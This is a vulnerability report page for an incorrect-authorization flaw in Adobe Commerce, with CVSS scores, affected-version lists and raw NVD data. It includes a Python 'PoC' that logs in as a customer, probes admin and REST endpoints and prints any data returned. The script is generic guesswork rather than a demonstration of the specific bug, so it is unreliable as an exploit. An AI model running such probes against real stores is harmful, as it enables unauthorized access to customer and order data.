Security Vulnerability Report
CVE-2025-54263 CVSS 8.1 HIGH

CVE-2025-54263

Published: 2025-10-14 21:15:35
Last Modified: 2025-10-20 13:47:20

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Incorrect Authorization vulnerability. A low-privileged attacker could leverage this vulnerability to bypass security measures and maintain unauthorized access. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE
Adobe Commerce 2.4.9-alpha2
Adobe Commerce 2.4.8-p2
Adobe Commerce 2.4.7-p7
Adobe Commerce 2.4.6-p12
Adobe Commerce 2.4.5-p14
Adobe Commerce 2.4.4-p15
Adobe Commerce, all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-54263 Adobe Commerce Incorrect Authorization PoC
# This PoC demonstrates the concept of exploiting incorrect authorization
# in Adobe Commerce to bypass security measures as a low-privileged user.
import re

import requests

TARGET_URL = "https://target-adobe-commerce-site.com"
LOW_PRIV_USER = "attacker_user"
LOW_PRIV_PASS = "attacker_password"


def get_form_key(session, url):
    """Retrieve the CSRF form key from the login page."""
    response = session.get(f"{url}/customer/account/login/")
    # Parse form_key from the response (simplified)
    match = re.search(r'form_key.*?value="([^"]+)"', response.text)
    return match.group(1) if match else ""


def is_authenticated(response):
    """Check if the login was successful."""
    return "logout" in response.text.lower()


def exploit_incorrect_authorization():
    """
    Exploit incorrect authorization vulnerability in Adobe Commerce.
    The vulnerability allows low-privileged users to access admin-only
    resources or APIs without proper authorization checks.
    """
    session = requests.Session()

    # Step 1: Authenticate as a low-privileged user (e.g., customer account)
    login_url = f"{TARGET_URL}/customer/account/loginPost/"
    login_data = {
        "login[username]": LOW_PRIV_USER,
        "login[password]": LOW_PRIV_PASS,
        "form_key": get_form_key(session, TARGET_URL),
    }
    response = session.post(login_url, data=login_data)
    if not is_authenticated(response):
        print("[-] Authentication failed")
        return False
    print("[+] Authenticated as low-privileged user")

    # Step 2: Attempt to access restricted admin resources
    # Due to incorrect authorization, these may be accessible
    restricted_endpoints = [
        "/admin/sales/order/",
        "/rest/V1/customers/search",
        "/rest/V1/orders",
        "/admin/customer/index/",
        "/rest/all/V1/customers/me",
    ]
    for endpoint in restricted_endpoints:
        url = f"{TARGET_URL}{endpoint}"
        response = session.get(url)
        if response.status_code == 200 and "Access Denied" not in response.text:
            print(f"[+] Unauthorized access granted: {endpoint}")
            # Extract sensitive data from response
            print(response.text[:500])
    return True


if __name__ == "__main__":
    exploit_incorrect_authorization()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54263", "sourceIdentifier": "[email protected]", "published": "2025-10-14T21:15:34.893", "lastModified": "2025-10-20T13:47:20.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Incorrect Authorization vulnerability. A low-privileged attacker could leverage this vulnerability to bypass security measures and maintain unauthorized access. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "D258D9EF-94FB-41F0-A7A5-7F66FA7A0055"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*", "matchCriteriaId": "4E5CF6F0-2388-4D3F-8FE1-43B8AF148564"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*", "matchCriteriaId": "1C3D7164-1C5F-40BC-9EEC-B0E00CD45808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*", "matchCriteriaId": "68AAE162-5957-42AF-BE20-40F341837FAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*", "matchCriteriaId": "D9D01159-3309-4F6B-93B0-2D89DDD33DEE"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*", "matchCriteriaId": "91736E79-D8E7-4AF2-8E01-A7B4EB8AD6F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*", "matchCriteriaId": "8412C043-64E7-4DFF-A303-13A6FE113BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*", "matchCriteriaId": "BBDA2BCF-E784-4CF3-B30D-6FF5BEE2055F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*", "matchCriteriaId": "D6D6F1A7-ABB5-4EDC-9EA8-98B74518847A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*", "matchCriteriaId": "CFEBDDF2-6443-4482-83B2-3CD272CF599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*", "matchCriteriaId": "6661093F-8D22-450F-BC6C-A8894A52E6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*", "matchCriteriaId": "2515DA6D-2E74-4A05-BD29-FEEF3322BCB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*", "matchCriteriaId": "69A1F1F7-E53C-40F3-B3D9-DC011FC353BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*", "matchCriteriaId": "6A56E96C-6CE5-442C-AA88-F0059B02B5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*", "matchCriteriaId": "8867F510-201C-4199-8554-53DE156CE669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*", "matchCriteriaId": "23988132-DD4E-4968-B6B8-954122F76081"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:-:*:*:*:*:*:*", "matchCriteriaId": "9B07F7B2-E915-4EFF-8FFC-91143CEF082E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*", "matchCriteriaId": "7F5E9DB6-1386-4274-8270-2FE0F0CAF7FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*", "matchCriteriaId": "5764CC97-C866-415D-A3A1-5B5B9E1C06A6"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*", "matchCriteriaId": "E82D10D8-2894-4E5B-B47B-F00964DD5CDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p12:*:*:*:*:*:*", "matchCriteriaId": "B044F2D9-E888-4852-8A40-DCE688860ED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p13:*:*:*:*:*:*", "matchCriteriaId": "6423C754-36F9-4680-9211-60940ED63E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p14:*:*:*:*:*:*", "matchCriteriaId": "3472064A-8C79-436B-965A-96834AE8D346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p2:*:*:*:*:*:*", "matchCriteriaId": "8605E4E6-0F7D-42C8-B35B-2349A0BEFC69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p3:*:*:*:*:*:*", "matchCriteriaId": "B6318F97-E59A-4425-8DC7-045C78A644F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p4:*:*:*:*:*:*", "matchCriteriaId": "324A573E-DBC8-42A0-8CB8-EDD8FBAB7115"}, {"vulnerable": true, ... (truncated)